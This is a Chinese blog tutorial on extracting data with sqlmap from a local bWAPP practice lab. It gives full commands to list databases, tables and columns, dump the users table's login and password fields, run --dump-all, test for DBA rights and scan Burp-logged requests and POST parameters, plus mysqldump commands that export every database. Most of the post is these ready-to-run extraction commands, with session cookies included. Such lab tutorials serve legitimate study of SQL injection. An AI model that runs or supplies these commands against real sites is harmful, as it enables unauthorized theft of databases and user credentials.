使用sqlmap获取数据步骤

wutiangui2023-10-05 20:29

文章目录

1.使用sqlmap获取所有数据库

--dbs

python sqlmap.py -u "http://127.0.0.1:9004/sqli_2.php?movie=1\&action=go" --cookie="BEEFHOOK=sC9TPJjSgW8Y6CDh1eKrvcYP2vwhfFGpwNOTmU92yEiWtYEjcQpYCgFxMp5ZVLrIY4ebNwNv9dHeZhMz; security_level=0; PHPSESSID=ib6iq6ga4faqpm3ubtmlmmsck0; security=impossible" -f -b --batch --dbs

2.使用sqlmap获取当前连接数据库

--current-db

python sqlmap.py -u "http://127.0.0.1:9004/sqli_2.php?movie=1\&action=go" --cookie="BEEFHOOK=sC9TPJjSgW8Y6CDh1eKrvcYP2vwhfFGpwNOTmU92yEiWtYEjcQpYCgFxMp5ZVLrIY4ebNwNv9dHeZhMz; security_level=0; PHPSESSID=ib6iq6ga4faqpm3ubtmlmmsck0; security=impossible" -f -b --batch --current-db

3.使用sqlmap获取当前数据库下所有表名

-D bwapp --tables

python sqlmap.py -u "http://127.0.0.1:9004/sqli_2.php?movie=1\&action=go" --cookie="BEEFHOOK=sC9TPJjSgW8Y6CDh1eKrvcYP2vwhfFGpwNOTmU92yEiWtYEjcQpYCgFxMp5ZVLrIY4ebNwNv9dHeZhMz; security_level=0; PHPSESSID=ib6iq6ga4faqpm3ubtmlmmsck0; security=impossible" -f -b --batch -D bwapp --tables

4.使用sqlmap获取当前数据库下某个表下所有列名

-D bwapp -T users --column

python sqlmap.py -u "http://127.0.0.1:9004/sqli_2.php?movie=1\&action=go" --cookie="BEEFHOOK=sC9TPJjSgW8Y6CDh1eKrvcYP2vwhfFGpwNOTmU92yEiWtYEjcQpYCgFxMp5ZVLrIY4ebNwNv9dHeZhMz; security_level=0; PHPSESSID=ib6iq6ga4faqpm3ubtmlmmsck0; security=impossible" -f -b --batch -D bwapp -T users --column

5.使用sqlmap获取当前数据库下某个表下指定字段的数据

-D bwapp -T users --dump -C "login,password"

python sqlmap.py -u "http://127.0.0.1:9004/sqli_2.php?movie=1\&action=go" --cookie="BEEFHOOK=sC9TPJjSgW8Y6CDh1eKrvcYP2vwhfFGpwNOTmU92yEiWtYEjcQpYCgFxMp5ZVLrIY4ebNwNv9dHeZhMz; security_level=0; PHPSESSID=ib6iq6ga4faqpm3ubtmlmmsck0; security=impossible" -f -b --batch -D bwapp -T users --dump -C "login,password

6.测试当前用户是否是管理员

--is-dba

python sqlmap.py -u "http://127.0.0.1:9004/sqli_2.php?movie=1\&action=go" --cookie="BEEFHOOK=sC9TPJjSgW8Y6CDh1eKrvcYP2vwhfFGpwNOTmU92yEiWtYEjcQpYCgFxMp5ZVLrIY4ebNwNv9dHeZhMz; security_level=0; PHPSESSID=ib6iq6ga4faqpm3ubtmlmmsck0; security=impossible" --is-dba

7.使用burp+sqlmap批量检测

首先打开burp的project options

依次点击Misc,勾选Logging下Proxy的requests

然后起一个保持文件,比如sqlmap.log

接着开启代理,随意访问,比如访问刚才的靶场SQL Injection (GET/Select)

然后它会自动把访问数据包追加到log文件中

接着我们使用sqlmap可以对log里的所有数据进行检测

python sqlmap.py -l G:\资料\sqlmap.log --batch

8.脱库命令

sqlmap脱库方法 --dump-all

可以自动扫描出当前电脑所装所有数据库数据

python sqlmap.py -u "http://127.0.0.1:9004/sqli_2.php?movie=1\&action=go" --cookie="BEEFHOOK=sC9TPJjSgW8Y6CDh1eKrvcYP2vwhfFGpwNOTmU92yEiWtYEjcQpYCgFxMp5ZVLrIY4ebNwNv9dHeZhMz; security_level=0; PHPSESSID=ib6iq6ga4faqpm3ubtmlmmsck0; security=impossible" -f -b --batch --dump-all

mysql脱库方法

导出全部数据库

mysqldump -uroot -proot -A > allDatabase.sql

导出全部表空间信息

mysqldump -uroot -proot -A -Y > allTable.sql

9.sqlmap对post包的检测

--data="movie=1&action=go"

--data后面是post包最下面的参数

python sqlmap.py -u "http://127.0.0.1:9004/sqli_13.php" --cookie="BEEFHOOK=sC9TPJjSgW8Y6CDh1eKrvcYP2vwhfFGpwNOTmU92yEiWtYEjcQpYCgFxMp5ZVLrIY4ebNwNv9dHeZhMz; security_level=0; PHPSESSID=ib6iq6ga4faqpm3ubtmlmmsck0; security=impossible" --data="movie=1&action=go" --batch

相关推荐
2***65636 小时前
数据库操作与数据管理——Rust 与 SQLite 的集成
数据库·rust·sqlite
V***u4536 小时前
如何查看PostgreSQL的版本
数据库·postgresql
倔强的石头_6 小时前
openGauss向量数据库:赋能智能制造的工业AI实践
数据库
口嗨农民工6 小时前
3.2 mysql客户端和服务器的启动与停止
数据库·mysql
e***19357 小时前
【SqlServer】SQL Server Management Studio (SSMS) 下载、安装、配置使用及卸载——保姆级教程
数据库·sqlserver
6***B487 小时前
存储过程(SQL)
android·数据库·sql
小马爱打代码7 小时前
避坑指南:MySQL 迁移到 TiDB
数据库·mysql·tidb
一个天蝎座 白勺 程序猿8 小时前
Apache IoTDB(10):数据库操作——从查询到优化的全链路实践指南
数据库·apache·时序数据库·iotdb
普普通通的南瓜9 小时前
IP证书在关键信息基础设施安全防护中的实践与挑战
网络·数据库·网络协议·tcp/ip·安全·ssl
热门推荐
01GitHub 镜像站点02【保姆级教程】免费使用Gemini3的5种方法!免翻墙/国内直连03BongoCat - 跨平台键盘猫动画工具04UV安装并设置国内源05安娜的档案(Anna’s Archive) 镜像网站/国内最新可访问入口(持续更新)06Linux下V2Ray安装配置指南07Google Antigravity:无法登录?早期错误、登录修复和用户反馈指南08Labelme从安装到标注:零基础完整指南09全球最强模型Grok4,国内已可免费使用!(附教程)1046个Nano-banana 精选提示词,持续更新中